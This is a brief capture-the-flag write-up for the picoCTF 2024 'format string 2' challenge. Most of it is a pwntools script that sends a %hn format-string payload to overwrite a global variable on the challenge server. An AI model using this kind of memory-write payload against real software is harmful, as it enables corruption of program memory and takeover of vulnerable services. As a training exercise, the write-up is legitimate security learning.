pico2024 format string 2

Format string vulnerability that writes to a global variable. Used %hn to write 16 bits to a location in memory (twice). from pwn import * r = remote('rhea.picoctf.net',54890) s = r.recvuntil('say?') # the first bytes are 0x6761 = 26465 (note the , after the d) # need 1285 more characters to get to 0x6c66 = 27750 r.sendline(b'%26464d,%20$hn%1281dAAAA%19$hnx,%22$llx,\x60\x40\x40\x00\x00\x00\x00\x00\x62\x40\x40\x00\x00\x00\x00\x00DEFGHIJKLMNOPQRSTUVWXYZ') r.interactive()